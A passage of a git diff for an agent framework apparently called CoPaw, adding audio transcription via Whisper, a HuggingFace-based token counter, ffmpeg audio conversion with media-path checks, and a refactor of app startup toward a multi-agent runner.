+        import whisper as _whisper  # noqa: F401
+
+        whisper_ok = True
+    except ImportError:
+        pass
+
+    return {
+        "available": ffmpeg_ok and whisper_ok,
+        "ffmpeg_installed": ffmpeg_ok,
+        "whisper_installed": whisper_ok,
+    }
+
+
+# ------------------------------------------------------------------
+# Transcription backends
+# ------------------------------------------------------------------
+
+
+async def _transcribe_local_whisper(file_path: str) -> Optional[str]:
+    """Transcribe using the locally installed ``openai-whisper`` library.
+
+    Requires both ``ffmpeg`` and ``openai-whisper`` to be installed.
+    Returns the transcribed text, or ``None`` on failure.
+    """
+    status = check_local_whisper_available()
+    if not status["available"]:
+        missing = []
+        if not status["ffmpeg_installed"]:
+            missing.append("ffmpeg")
+        if not status["whisper_installed"]:
+            missing.append("openai-whisper")
+        logger.warning(
+            "Local Whisper unavailable (missing: %s). "
+            "Install the missing dependencies to use local transcription.",
+            ", ".join(missing),
+        )
+        return None
+
+    def _run():
+        model = _get_local_whisper_model()
+        result = model.transcribe(file_path)
+        return (result.get("text") or "").strip()
+
+    try:
+        text = await asyncio.to_thread(_run)
+        if text:
+            logger.debug(
+                "Local Whisper transcribed %s: %s",
+                file_path,
+                text[:80],
+            )
+            return text
+        logger.warning(
+            "Local Whisper returned empty text for %s",
+            file_path,
+        )
+        return None
+    except Exception:
+        logger.warning(
+            "Local Whisper transcription failed for %s",
+            file_path,
+            exc_info=True,
+        )
+        return None
+
+
+def _get_configured_provider_creds() -> Optional[Tuple[str, str]]:
+    """Return ``(base_url, api_key)`` for the explicitly configured provider.
+
+    Returns ``None`` when no provider is configured or the configured
+    provider is not found / has no usable credentials.
+    """
+    from ...config import load_config
+
+    configured_id = load_config().agents.transcription_provider_id
+    if not configured_id:
+        return None
+
+    manager = _get_manager()
+    if manager is None:
+        return None
+
+    provider = manager.get_provider(configured_id)
+    if provider is None:
+        logger.warning(
+            "Configured transcription provider '%s' not found",
+            configured_id,
+        )
+        return None
+
+    creds = _url_for_provider(provider)
+    if creds is None:
+        logger.warning(
+            "Configured transcription provider '%s' has no usable credentials",
+            configured_id,
+        )
+    return creds
+
+
+async def _transcribe_whisper_api(file_path: str) -> Optional[str]:
+    """Transcribe using the OpenAI-compatible Whisper API endpoint.
+
+    Only uses the explicitly configured provider — no auto-detection.
+    Returns the transcribed text, or ``None`` on failure.
+    """
+    creds = _get_configured_provider_creds()
+    if creds is None:
+        logger.warning(
+            "No transcription provider configured; skipping transcription",
+        )
+        return None
+
+    base_url, api_key = creds
+
+    try:
+        from openai import AsyncOpenAI
+    except ImportError:
+        logger.warning(
+            "openai package not installed; cannot transcribe audio",
+        )
+        return None
+
+    from ...config import load_config
+
+    model_name = load_config().agents.transcription_model or "whisper-1"
+
+    client = AsyncOpenAI(
+        base_url=base_url,
+        api_key=api_key or "none",
+        timeout=60,
+    )
+
+    try:
+        with open(file_path, "rb") as f:
+            transcript = await client.audio.transcriptions.create(
+                model=model_name,
+                file=f,
+            )
+        text = transcript.text.strip()
+        if text:
+            logger.debug("Transcribed audio %s: %s", file_path, text[:80])
+            return text
+        logger.warning("Transcription returned empty text for %s", file_path)
+        return None
+    except Exception:
+        logger.warning(
+            "Audio transcription failed for %s",
+            file_path,
+            exc_info=True,
+        )
+        return None
+
+
+# ------------------------------------------------------------------
+# Public entry point
+# ------------------------------------------------------------------
+
+
+async def transcribe_audio(file_path: str) -> Optional[str]:
+    """Transcribe an audio file to text.
+
+    Dispatches to either the Whisper API or local Whisper based on the
+    ``transcription_provider_type`` config setting. When the setting is
+    ``"disabled"`` (the default), returns ``None`` immediately.
+
+    Returns the transcribed text, or ``None`` on failure.
+    """
+    from ...config import load_config
+
+    provider_type = load_config().agents.transcription_provider_type
+
+    if provider_type == "disabled":
+        logger.debug("Transcription is disabled; skipping")
+        return None
+    if provider_type == "local_whisper":
+        return await _transcribe_local_whisper(file_path)
+    if provider_type == "whisper_api":
+        return await _transcribe_whisper_api(file_path)
+
+    logger.warning("Unknown transcription_provider_type: %s", provider_type)
+    return None
diff --git a/src/copaw/agents/utils/copaw_token_counter.py b/src/copaw/agents/utils/copaw_token_counter.py
new file mode 100644
index 000000000..5a1b1b69a
--- /dev/null
+++ b/src/copaw/agents/utils/copaw_token_counter.py
@@ -0,0 +1,192 @@
+# -*- coding: utf-8 -*-
+"""Token counting utilities for CoPaw using HuggingFace tokenizers.
+
+This module provides a configurable token counter that supports dynamic
+switching between different tokenizer models based on runtime configuration.
+"""
+import logging
+import os
+from pathlib import Path
+from typing import Any, TYPE_CHECKING
+
+from agentscope.token import HuggingFaceTokenCounter
+
+if TYPE_CHECKING:
+    from copaw.config.config import AgentProfileConfig
+
+logger = logging.getLogger(__name__)
+
+
+class CopawTokenCounter(HuggingFaceTokenCounter):
+    """Token counter for CoPaw with configurable tokenizer support.
+
+    This class extends HuggingFaceTokenCounter to provide token counting
+    functionality with support for both local and remote tokenizers,
+    as well as HuggingFace mirror for users in China.
+
+    Attributes:
+        token_count_model: The tokenizer model path or "default" for
+            local tokenizer.
+        token_count_use_mirror: Whether to use HuggingFace mirror.
+        token_count_estimate_divisor: Divisor for character-based token
+            estimation.
+    """
+
+    def __init__(
+        self,
+        token_count_model: str,
+        token_count_use_mirror: bool,
+        token_count_estimate_divisor: float = 3.75,
+        **kwargs,
+    ):
+        """Initialize the token counter with the specified configuration.
+
+        Args:
+            token_count_model: The tokenizer model path. Use "default"
+                for the bundled local tokenizer, or provide a HuggingFace
+                model identifier or path to a custom tokenizer.
+            token_count_use_mirror: Whether to use the HuggingFace mirror
+                (https://hf-mirror.com) for downloading tokenizers.
+                Useful for users in China.
+            token_count_estimate_divisor: Divisor for character-based token
+                estimation (default: 3.75).
+            **kwargs: Additional keyword arguments passed to
+                HuggingFaceTokenCounter.
+        """
+        self.token_count_model = token_count_model
+        self.token_count_use_mirror = token_count_use_mirror
+        self.token_count_estimate_divisor = token_count_estimate_divisor
+
+        # Set HuggingFace endpoint for mirror support
+        if token_count_use_mirror:
+            os.environ["HF_ENDPOINT"] = "https://hf-mirror.com"
+        else:
+            os.environ.pop("HF_ENDPOINT", None)
+
+        # Resolve tokenizer path
+        if token_count_model == "default":
+            tokenizer_path = str(
+                Path(__file__).parent.parent.parent / "tokenizer",
+            )
+        else:
+            tokenizer_path = token_count_model
+
+        try:
+            super().__init__(
+                pretrained_model_name_or_path=tokenizer_path,
+                use_mirror=token_count_use_mirror,
+                use_fast=True,
+                trust_remote_code=True,
+                **kwargs,
+            )
+            self._tokenizer_available = True
+
+        except Exception as e:
+            logger.exception("Failed to initialize tokenizer: %s", e)
+            self._tokenizer_available = False
+
+    async def count(
+        self,
+        messages: list[dict],
+        tools: list[dict] | None = None,
+        text: str | None = None,
+        **kwargs: Any,
+    ) -> int:
+        """Count tokens in messages or text.
+
+        If text is provided, counts tokens directly in the text string.
+        Otherwise, counts tokens in the messages using the parent class method.
+
+        Args:
+            messages: List of message dictionaries in chat format.
+            tools: Optional list of tool definitions for token counting.
+            text: Optional text string to count tokens directly.
+            **kwargs: Additional keyword arguments passed to parent
+                count method.
+
+        Returns:
+            The number of tokens, guaranteed to be at least the
+            estimated minimum.
+        """
+        if text:
+            if self._tokenizer_available:
+                try:
+                    token_ids = self.tokenizer.encode(text)
+                    return max(len(token_ids), self.estimate_tokens(text))
+                except Exception as e:
+                    logger.exception(
+                        "Failed to encode text with tokenizer: %s",
+                        e,
+                    )
+                    return self.estimate_tokens(text)
+            else:
+                return self.estimate_tokens(text)
+        else:
+            return await super().count(messages, tools, **kwargs)
+
+    def estimate_tokens(self, text: str) -> int:
+        """Estimate the number of tokens in a text string.
+
+        Provides a fast character-based estimation as a fallback
+        or lower bound. Uses the configured divisor from agent settings.
+
+        Args:
+            text: The text string to estimate tokens for.
+
+        Returns:
+            The estimated number of tokens in the text string.
+        """
+        return int(
+            len(text.encode("utf-8")) / self.token_count_estimate_divisor
+            + 0.5,
+        )
+
+
+# Global token counter instance cache (keyed by configuration tuple)
+_token_counter_cache: dict[tuple, CopawTokenCounter] = {}
+
+
+def _get_copaw_token_counter(
+    agent_config: "AgentProfileConfig",
+) -> CopawTokenCounter:
+    """Get or create a token counter instance for the given agent conf.
+
+    This function implements a cache based on token counter configuration.
+    If a token counter with the same configuration already exists, it will be
+    reused. Otherwise, a new instance will be created.
+
+    Args:
+        agent_config: Agent profile configuration containing running
+            settings including token_count_model, token_count_use_mirror,
+            and token_count_estimate_divisor.
+
+    Returns:
+        CopawTokenCounter: A token counter instance for the given
+            configuration.
+
+    Note:
+        Token counters are cached by their configuration tuple to enable
+        reuse across agents with identical settings.
+    """
+    running_config = agent_config.running
+    config_key = (
+        running_config.token_count_model,
+        running_config.token_count_use_mirror,
+        running_config.token_count_estimate_divisor,
+    )
+
+    if config_key not in _token_counter_cache:
+        _token_counter_cache[config_key] = CopawTokenCounter(
+            token_count_model=running_config.token_count_model,
+            token_count_use_mirror=running_config.token_count_use_mirror,
+            token_count_estimate_divisor=(
+                running_config.token_count_estimate_divisor
+            ),
+        )
+        logger.debug(
+            "Token counter created with model=%s, mirror=%s, divisor=%s",
+            running_config.token_count_model,
+            running_config.token_count_use_mirror,
+            running_config.token_count_estimate_divisor,
+        )
+    return _token_counter_cache[config_key]
diff --git a/src/copaw/agents/utils/message_processing.py b/src/copaw/agents/utils/message_processing.py
index a1c7ec37b..1eb0a651c 100644
--- a/src/copaw/agents/utils/message_processing.py
+++ b/src/copaw/agents/utils/message_processing.py
@@ -6,6 +6,7 @@
 - Message content manipulation
 - Message validation
 """
+import asyncio
 import logging
 import os
 import urllib.parse
@@ -21,16 +22,23 @@
 
 logger = logging.getLogger(__name__)
 
-# Only allow local paths under this dir (channels save media here).
-_ALLOWED_MEDIA_ROOT = WORKING_DIR / "media"
+# Trusted directories where channels save downloaded media.
+_ALLOWED_MEDIA_ROOTS = [ + WORKING_DIR / "media", + WORKING_DIR / "downloads", +] def _is_allowed_media_path(path: str) -> bool: - """True if path is a file under _ALLOWED_MEDIA_ROOT.""" + """True if *path* is a file under one of the allowed media directories.""" try: resolved = Path(path).expanduser().resolve() - root = _ALLOWED_MEDIA_ROOT.resolve() - return resolved.is_file() and resolved.is_relative_to(root) + if not resolved.is_file(): + return False + return any( + resolved.is_relative_to(root.resolve()) + for root in _ALLOWED_MEDIA_ROOTS + ) except Exception: return False @@ -118,9 +126,84 @@ def _media_type_from_path(path: str) -> str: ".wav": "audio/wav", ".mp3": "audio/mp3", ".opus": "audio/opus", + ".ogg": "audio/ogg", + ".flac": "audio/flac", + ".m4a": "audio/mp4", + ".aac": "audio/aac", }.get(ext, "audio/octet-stream") +# Extensions accepted by the agentscope OpenAIChatFormatter +_FORMATTER_SUPPORTED_AUDIO_EXTS = {".wav", ".mp3"} + + +def _convert_audio_to_wav(src_path: str) -> Optional[str]: + """Convert an audio file to .wav using ffmpeg if the extension is not + natively supported by the LLM formatter. + + Uses a unique temporary file name to avoid overwriting existing files. + + Returns the path to the converted .wav file, or None if conversion + failed or was not needed. + """ + ext = (os.path.splitext(src_path)[1] or "").lower() + if ext in _FORMATTER_SUPPORTED_AUDIO_EXTS: + return None # already supported, no conversion needed + + import subprocess + import shutil + import tempfile + + if not shutil.which("ffmpeg"): + logger.warning( + "ffmpeg not found; cannot convert %s audio to wav. " + "Install ffmpeg to enable audio format conversion.", + ext, + ) + return None + + # Use a temp file in the same directory to avoid clobbering. + src_dir = os.path.dirname(src_path) or "." 
+ fd, dst_path = tempfile.mkstemp(suffix=".wav", dir=src_dir)
+ os.close(fd)
+ try:
+ subprocess.run(
+ [
+ "ffmpeg",
+ "-y",
+ "-loglevel",
+ "error",
+ "-i",
+ src_path,
+ "-ar",
+ "16000",
+ "-ac",
+ "1",
+ dst_path,
+ ],
+ stdout=subprocess.DEVNULL,
+ stderr=subprocess.PIPE,
+ timeout=30,
+ check=True,
+ )
+ logger.debug("Converted audio %s -> %s", src_path, dst_path)
+ return dst_path
+ except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as e:
+ stderr = getattr(e, "stderr", b"") or b""
+ logger.warning(
+ "Audio conversion failed for %s: %s\nffmpeg stderr: %s",
+ src_path,
+ e,
+ stderr.decode(errors="replace"),
+ )
+ # Clean up the temp file on failure.
+ try:
+ os.unlink(dst_path)
+ except OSError:
+ pass
+ return None
+
+
 def _update_block_with_local_path(
 block: dict,
 block_type: str,
@@ -157,6 +240,93 @@ def _handle_download_failure(block_type: str) -> Optional[dict]:
 return None
 
 
+async def _process_audio_block(
+ message_content: list,
+ index: int,
+ local_path: str,
+ block: dict,
+) -> bool:
+ """Handle an audio block according to the configured audio_mode.
+
+ Modes:
+ - ``"auto"`` (default): try transcription; if it succeeds, replace
+ the audio block with the transcribed text and suppress file
+ metadata. If transcription fails (no provider, missing deps,
+ API error), show a file-uploaded placeholder instead. Audio is
+ never sent directly to the model in this mode.
+ - ``"native"``: send the audio block directly to the model
+ (convert via ffmpeg if needed). No transcription is attempted.
+ If the file format is unsupported and conversion fails, a text
+ placeholder is shown instead.
+
+ Returns:
+ True if the audio was fully handled (transcribed or sent natively)
+ — the "file downloaded" notification will be suppressed.
+ False if transcription failed — the notification is kept so the
+ LLM knows the file path.
+ """
+ # Security: reject paths outside the allowed media directories.
+ if not _is_allowed_media_path(local_path): + logger.warning( + "Audio path outside allowed media dir, rejecting: %s", + local_path, + ) + message_content[index] = { + "type": "text", + "text": "[Voice message]: (audio file rejected)", + } + return True + + from .audio_transcription import transcribe_audio + + audio_mode = load_config().agents.audio_mode + + if audio_mode == "native": + converted = await asyncio.to_thread( + _convert_audio_to_wav, + local_path, + ) + ext = (os.path.splitext(local_path)[1] or "").lower() + if converted: + audio_path = converted + elif ext in _FORMATTER_SUPPORTED_AUDIO_EXTS: + # Already a supported format, no conversion needed. + audio_path = local_path + else: + # Unsupported format and conversion failed — show placeholder + # instead of sending an unsupported audio block to the model. + message_content[index] = { + "type": "text", + "text": ( + "[Voice message]: (audio conversion failed, " + "install ffmpeg to enable native audio)" + ), + } + return True + block["source"] = { + "type": "url", + "url": Path(audio_path).as_uri(), + "media_type": _media_type_from_path(audio_path), + } + return True + + # "auto": attempt transcription. + text = await transcribe_audio(local_path) + if text: + message_content[index] = { + "type": "text", + "text": f"[Voice message]: {text}", + } + return True + + # Transcription failed — show file-uploaded placeholder. + message_content[index] = { + "type": "text", + "text": "[Voice message]: (audio file received)", + } + return False + + async def _process_single_block( message_content: list, index: int, @@ -201,11 +371,26 @@ async def _process_single_block( local_path = await _process_single_file_block(source, filename) if local_path: - message_content[index] = _update_block_with_local_path( - block, - block_type, - local_path, - ) + if block_type == "audio": + # Audio blocks need transcription or format conversion + # depending on the configured audio_mode. 
+ _update_block_with_local_path(block, block_type, local_path) + handled = await _process_audio_block( + message_content, + index, + local_path, + block, + ) + if handled: + # Audio was transcribed or sent natively; suppress the + # "file downloaded" notification that would follow. + return None + else: + message_content[index] = _update_block_with_local_path( + block, + block_type, + local_path, + ) logger.debug( "Updated %s block with local path: %s", block_type, diff --git a/src/copaw/agents/utils/setup_utils.py b/src/copaw/agents/utils/setup_utils.py index f9b584c28..4caf82b0d 100644 --- a/src/copaw/agents/utils/setup_utils.py +++ b/src/copaw/agents/utils/setup_utils.py @@ -14,18 +14,23 @@ def copy_md_files( language: str, skip_existing: bool = False, + workspace_dir: Path | None = None, ) -> list[str]: """Copy md files from agents/md_files to working directory. Args: language: Language code (e.g. 'en', 'zh') skip_existing: If True, skip files that already exist in working dir. + workspace_dir: Target workspace directory. If None, uses WORKING_DIR. Returns: List of copied file names. 
""" from ...constant import WORKING_DIR + # Use provided workspace_dir or default to WORKING_DIR + target_dir = workspace_dir if workspace_dir is not None else WORKING_DIR + # Get md_files directory path with language subdirectory md_files_dir = Path(__file__).parent.parent / "md_files" / language @@ -40,13 +45,13 @@ def copy_md_files( logger.error("Default 'en' md files not found either") return [] - # Ensure working directory exists - WORKING_DIR.mkdir(parents=True, exist_ok=True) + # Ensure target directory exists + target_dir.mkdir(parents=True, exist_ok=True) - # Copy all .md files to working directory + # Copy all .md files to target directory copied_files: list[str] = [] for md_file in md_files_dir.glob("*.md"): - target_file = WORKING_DIR / md_file.name + target_file = target_dir / md_file.name if skip_existing and target_file.exists(): logger.debug("Skipped existing md file: %s", md_file.name) continue @@ -66,7 +71,7 @@ def copy_md_files( "Copied %d md file(s) [%s] to %s", len(copied_files), language, - WORKING_DIR, + target_dir, ) return copied_files diff --git a/src/copaw/app/_app.py b/src/copaw/app/_app.py index 8c908272b..86ea71c72 100644 --- a/src/copaw/app/_app.py +++ b/src/copaw/app/_app.py @@ -1,6 +1,5 @@ # -*- coding: utf-8 -*- # pylint: disable=redefined-outer-name,unused-argument -import asyncio import mimetypes import os import time @@ -13,27 +12,22 @@ from fastapi.responses import FileResponse from agentscope_runtime.engine.app import AgentApp -from .runner import AgentRunner -from ..config import ( # pylint: disable=no-name-in-module - load_config, - update_last_dispatch, - ConfigWatcher, -) -from ..config.utils import get_jobs_path, get_chats_path, get_config_path +from ..config import load_config # pylint: disable=no-name-in-module +from ..config.utils import get_config_path from ..constant import DOCS_ENABLED, LOG_LEVEL_ENV, CORS_ORIGINS, WORKING_DIR from ..__version__ import __version__ from ..utils.logging import setup_logger, 
add_copaw_file_handler -from .channels import ChannelManager # pylint: disable=no-name-in-module -from .channels.utils import make_process_from_runner -from .mcp import MCPClientManager, MCPConfigWatcher # MCP hot-reload support -from .runner.repo.json_repo import JsonChatRepository -from .crons.repo.json_repo import JsonJobRepository -from .crons.manager import CronManager -from .runner.manager import ChatManager -from .routers import router as api_router +from .auth import AuthMiddleware +from .routers import router as api_router, create_agent_scoped_router +from .routers.agent_scoped import AgentContextMiddleware from .routers.voice import voice_router from ..envs import load_envs_into_environ from ..providers.provider_manager import ProviderManager +from .multi_agent_manager import MultiAgentManager +from .migration import ( + migrate_legacy_workspace_to_default_agent, + ensure_default_agent_exists, +) # Apply log level on load so reload child process gets same level as CLI. logger = setup_logger(os.environ.get(LOG_LEVEL_ENV, "info")) @@ -50,7 +44,98 @@ # so they are available before the lifespan starts. load_envs_into_environ() -runner = AgentRunner() + +# Dynamic runner that selects the correct workspace runner based on request +class DynamicMultiAgentRunner: + """Runner wrapper that dynamically routes to the correct workspace runner. + + This allows AgentApp to work with multiple agents by inspecting + the X-Agent-Id header on each request. 
+ """ + + def __init__(self): + self.framework_type = "agentscope" + self._multi_agent_manager = None + + def set_multi_agent_manager(self, manager): + """Set the MultiAgentManager instance after initialization.""" + self._multi_agent_manager = manager + + async def _get_workspace_runner(self, request): + """Get the correct workspace runner based on request.""" + from .agent_context import get_current_agent_id + + # Get agent_id from context (set by middleware or header) + agent_id = get_current_agent_id() + + logger.debug(f"_get_workspace_runner: agent_id={agent_id}") + + # Get the correct workspace runner + if not self._multi_agent_manager: + raise RuntimeError("MultiAgentManager not initialized") + + try: + workspace = await self._multi_agent_manager.get_agent(agent_id) + logger.debug( + f"Got workspace: {workspace.agent_id}, " + f"runner: {workspace.runner}", + ) + return workspace.runner + except ValueError as e: + logger.error(f"Agent not found: {e}") + raise + except Exception as e: + logger.error( + f"Error getting workspace runner: {e}", + exc_info=True, + ) + raise + + async def stream_query(self, request, *args, **kwargs): + """Dynamically route to the correct workspace runner.""" + logger.debug("DynamicMultiAgentRunner.stream_query called") + try: + runner = await self._get_workspace_runner(request) + logger.debug(f"Got runner: {runner}, type: {type(runner)}") + # Delegate to the actual runner's stream_query generator + count = 0 + async for item in runner.stream_query(request, *args, **kwargs): + count += 1 + logger.debug(f"Yielding item #{count}: {type(item)}") + yield item + logger.debug(f"stream_query completed, yielded {count} items") + except Exception as e: + logger.error( + f"Error in stream_query: {e}", + exc_info=True, + ) + # Yield error message to client + yield { + "error": str(e), + "type": "error", + } + + async def query_handler(self, request, *args, **kwargs): + """Dynamically route to the correct workspace runner.""" + runner = await 
self._get_workspace_runner(request) + # Delegate to the actual runner's query_handler generator + async for item in runner.query_handler(request, *args, **kwargs): + yield item + + # Async context manager support for AgentApp lifecycle + async def __aenter__(self): + """ + No-op context manager entry (workspaces manage their own runners). + """ + return self + + async def __aexit__(self, exc_type, exc_val, exc_tb): + """No-op context manager exit (workspaces manage their own runners).""" + return None + + +# Use dynamic runner for AgentApp +runner = DynamicMultiAgentRunner() agent_app = AgentApp( app_name="Friday", @@ -65,343 +150,50 @@ async def lifespan( ): # pylint: disable=too-many-statements,too-many-branches startup_start_time = time.time() add_copaw_file_handler(WORKING_DIR / "copaw.log") - await runner.start() - # --- MCP client manager init (independent module, hot-reloadable) --- - config = load_config() - mcp_manager = MCPClientManager() - if hasattr(config, "mcp"): - try: - await mcp_manager.init_from_config(config.mcp) - logger.debug("MCP client manager initialized") - except BaseException as e: - if isinstance(e, (KeyboardInterrupt, SystemExit)): - raise - logger.exception("Failed to initialize MCP manager") - runner.set_mcp_manager(mcp_manager) - - # --- channel connector init/start (from config.json) --- - channel_manager = ChannelManager.from_config( - process=make_process_from_runner(runner), - config=config, - on_last_dispatch=update_last_dispatch, - ) - await channel_manager.start_all() - - # --- cron init/start --- - repo = JsonJobRepository(get_jobs_path()) - cron_manager = CronManager( - repo=repo, - runner=runner, - channel_manager=channel_manager, - timezone="UTC", - ) - await cron_manager.start() - - # --- chat manager init and connect to runner.session --- - chat_repo = JsonChatRepository(get_chats_path()) - chat_manager = ChatManager( - repo=chat_repo, - ) - - runner.set_chat_manager(chat_manager) - - # --- config file watcher (channels 
+ heartbeat hot-reload on change) --- - config_watcher = ConfigWatcher( - channel_manager=channel_manager, - cron_manager=cron_manager, - ) - await config_watcher.start() - - # --- MCP config watcher (auto-reload MCP clients on change) --- - mcp_watcher = None - if hasattr(config, "mcp"): - try: - mcp_watcher = MCPConfigWatcher( - mcp_manager=mcp_manager, - config_loader=load_config, - config_path=get_config_path(), - ) - await mcp_watcher.start() - logger.debug("MCP config watcher started") - except BaseException as e: - if isinstance(e, (KeyboardInterrupt, SystemExit)): - raise - logger.exception("Failed to start MCP watcher") + # --- Multi-agent migration and initialization --- + logger.info("Checking for legacy config migration...") + migrate_legacy_workspace_to_default_agent() + ensure_default_agent_exists() - # Inject channel_manager into approval service so it can - # proactively push approval messages to channels like DingTalk. - from .approvals import get_approval_service + # --- Multi-agent manager initialization --- + logger.info("Initializing MultiAgentManager...") + multi_agent_manager = MultiAgentManager() - get_approval_service().set_channel_manager(channel_manager) + # Start all configured agents (handled by manager) + await multi_agent_manager.start_all_configured_agents() # --- Model provider manager (non-reloadable, in-memory) --- provider_manager = ProviderManager.get_instance() - # expose to endpoints - app.state.runner = runner - app.state.channel_manager = channel_manager - app.state.cron_manager = cron_manager - app.state.chat_manager = chat_manager - app.state.config_watcher = config_watcher - app.state.mcp_manager = mcp_manager - app.state.mcp_watcher = mcp_watcher - app.state.provider_manager = provider_manager + # Expose to endpoints - multi-agent manager + app.state.multi_agent_manager = multi_agent_manager - _restart_task: asyncio.Task | None = None + # Connect DynamicMultiAgentRunner to MultiAgentManager + if isinstance(runner, 
DynamicMultiAgentRunner):
+ runner.set_multi_agent_manager(multi_agent_manager)
 
- async def _restart_services() -> None:
- """Stop all managers, then rebuild from config (no exit).
+ # Helper function to get agent instance by ID (async)
+ async def _get_agent_by_id(agent_id: str | None = None):
+ """Get agent instance by ID, or active agent if not specified."""
+ if agent_id is None:
+ config = load_config(get_config_path())
+ agent_id = config.agents.active_agent or "default"
+ return await multi_agent_manager.get_agent(agent_id)
 
- Single-flight: only one restart runs at a time. Concurrent or
- duplicate callers wait for the in-progress restart and return
- successfully. Uses asyncio.shield() so that when the caller
- (e.g. channel request) is cancelled, the restart task keeps
- running and does not propagate cancellation into deep task
- trees (avoids RecursionError on cancel).
- """
- # pylint: disable=too-many-statements
- nonlocal _restart_task
- # Caller task (in _local_tasks) must not be cancelled so it can
- # yield the final "Restart completed" message.
- restart_requester_task = asyncio.current_task() + app.state.get_agent_by_id = _get_agent_by_id - async def _run_then_clear() -> None: - try: - await _do_restart_services( - restart_requester_task=restart_requester_task, - ) - finally: - nonlocal _restart_task - _restart_task = None - - if _restart_task is not None and not _restart_task.done(): - logger.info( - "_restart_services: waiting for in-progress restart to finish", - ) - await asyncio.shield(_restart_task) - return - if _restart_task is not None and _restart_task.done(): - _restart_task = None - logger.info("_restart_services: starting restart") - _restart_task = asyncio.create_task(_run_then_clear()) - await asyncio.shield(_restart_task) - - async def _teardown_new_stack( - mcp_watcher=None, - config_watcher=None, - cron_mgr=None, - ch_mgr=None, - mcp_mgr=None, - ) -> None: - """Stop new stack in reverse start order (for rollback on failure).""" - if mcp_watcher is not None: - try: - await mcp_watcher.stop() - except Exception: - logger.debug( - "rollback: mcp_watcher.stop failed", - exc_info=True, - ) - if config_watcher is not None: - try: - await config_watcher.stop() - except Exception: - logger.debug( - "rollback: config_watcher.stop failed", - exc_info=True, - ) - if cron_mgr is not None: - try: - await cron_mgr.stop() - except Exception: - logger.debug( - "rollback: cron_manager.stop failed", - exc_info=True, - ) - if ch_mgr is not None: - try: - await ch_mgr.stop_all() - except Exception: - logger.debug( - "rollback: channel_manager.stop_all failed", - exc_info=True, - ) - if mcp_mgr is not None: - try: - await mcp_mgr.close_all() - except Exception: - logger.debug( - "rollback: mcp_manager.close_all failed", - exc_info=True, - ) - - async def _do_restart_services( - restart_requester_task: asyncio.Task | None = None, - ) -> None: - """Cancel in-flight agent requests first (so they can send error to - channel), then stop old stack, then start new stack and swap. 
- """ - # pylint: disable=too-many-statements - try: - config = load_config(get_config_path()) - except Exception: - logger.exception("restart_services: load_config failed") - return - - # 1) Cancel in-flight agent requests. Do not wait for them so the - # console restart task never blocks (avoid deadlock when cancelled - # task is slow to exit). - local_tasks = getattr(agent_app, "_local_tasks", None) - if local_tasks: - to_cancel = [ - t - for t in list(local_tasks.values()) - if t is not restart_requester_task and not t.done() - ] - for t in to_cancel: - t.cancel() - if to_cancel: - logger.info( - "restart: cancelled %s in-flight task(s), not waiting", - len(to_cancel), - ) - - # 2) Stop old stack - cfg_w = app.state.config_watcher - mcp_w = getattr(app.state, "mcp_watcher", None) - cron_mgr = app.state.cron_manager - ch_mgr = app.state.channel_manager - mcp_mgr = app.state.mcp_manager - try: - await cfg_w.stop() - except Exception: - logger.exception( - "restart_services: old config_watcher.stop failed", - ) - if mcp_w is not None: - try: - await mcp_w.stop() - except Exception: - logger.exception( - "restart_services: old mcp_watcher.stop failed", - ) - try: - await cron_mgr.stop() - except Exception: - logger.exception( - "restart_services: old cron_manager.stop failed", - ) - try: - await ch_mgr.stop_all() - except Exception: - logger.exception( - "restart_services: old channel_manager.stop_all failed", - ) - if mcp_mgr is not None: - try: - await mcp_mgr.close_all() - except Exception: - logger.exception( - "restart_services: old mcp_manager.close_all failed", - ) - - # 3) Build and start new stack - new_mcp_manager = MCPClientManager() - if hasattr(config, "mcp"): - try: - await new_mcp_manager.init_from_config(config.mcp) - except Exception: - logger.exception( - "restart_services: mcp init_from_config failed", - ) - return - - new_channel_manager = ChannelManager.from_config( - process=make_process_from_runner(runner), - config=config, - 
on_last_dispatch=update_last_dispatch, - ) - try: - await new_channel_manager.start_all() - except Exception: - logger.exception( - "restart_services: channel_manager.start_all failed", - ) - await _teardown_new_stack(mcp_mgr=new_mcp_manager) - return - - job_repo = JsonJobRepository(get_jobs_path()) - new_cron_manager = CronManager( - repo=job_repo, - runner=runner, - channel_manager=new_channel_manager, - timezone="UTC", - ) - try: - await new_cron_manager.start() - except Exception: - logger.exception( - "restart_services: cron_manager.start failed", - ) - await _teardown_new_stack( - ch_mgr=new_channel_manager, - mcp_mgr=new_mcp_manager, - ) - return + # Global managers (shared across all agents) + app.state.provider_manager = provider_manager - new_config_watcher = ConfigWatcher( - channel_manager=new_channel_manager, - cron_manager=new_cron_manager, - ) - try: - await new_config_watcher.start() - except Exception: - logger.exception( - "restart_services: config_watcher.start failed", - ) - await _teardown_new_stack( - cron_mgr=new_cron_manager, - ch_mgr=new_channel_manager, - mcp_mgr=new_mcp_manager, - ) - return + # Setup approval service with default agent's channel_manager + default_agent = await multi_agent_manager.get_agent("default") + if default_agent.channel_manager: + from .approvals import get_approval_service - new_mcp_watcher = None - if hasattr(config, "mcp"): - try: - new_mcp_watcher = MCPConfigWatcher( - mcp_manager=new_mcp_manager, - config_loader=load_config, - config_path=get_config_path(), - ) - await new_mcp_watcher.start() - except Exception: - logger.exception( - "restart_services: mcp_watcher.start failed", - ) - await _teardown_new_stack( - config_watcher=new_config_watcher, - cron_mgr=new_cron_manager, - ch_mgr=new_channel_manager, - mcp_mgr=new_mcp_manager, - ) - return - - if hasattr(config, "mcp"): - runner.set_mcp_manager(new_mcp_manager) - app.state.mcp_manager = new_mcp_manager - app.state.mcp_watcher = new_mcp_watcher - else: - 
runner.set_mcp_manager(None) - app.state.mcp_manager = None - app.state.mcp_watcher = None - app.state.channel_manager = new_channel_manager - app.state.cron_manager = new_cron_manager - app.state.config_watcher = new_config_watcher - logger.info("Daemon restart (in-process) completed: managers rebuilt") - - setattr(runner, "_restart_callback", _restart_services) + get_approval_service().set_channel_manager( + default_agent.channel_manager, + ) startup_elapsed = time.time() - startup_start_time logger.debug( @@ -411,39 +203,16 @@ async def _do_restart_services( try: yield finally: - # Stop current app.state refs (post-restart instances if any) - cfg_w = getattr(app.state, "config_watcher", None) - mcp_w = getattr(app.state, "mcp_watcher", None) - cron_mgr = getattr(app.state, "cron_manager", None) - ch_mgr = getattr(app.state, "channel_manager", None) - mcp_mgr = getattr(app.state, "mcp_manager", None) - # stop order: watchers -> cron -> channels -> mcp -> runner - if cfg_w is not None: - try: - await cfg_w.stop() - except Exception: - pass - if mcp_w is not None: - try: - await mcp_w.stop() - except Exception: - pass - if cron_mgr is not None: - try: - await cron_mgr.stop() - except Exception: - pass - if 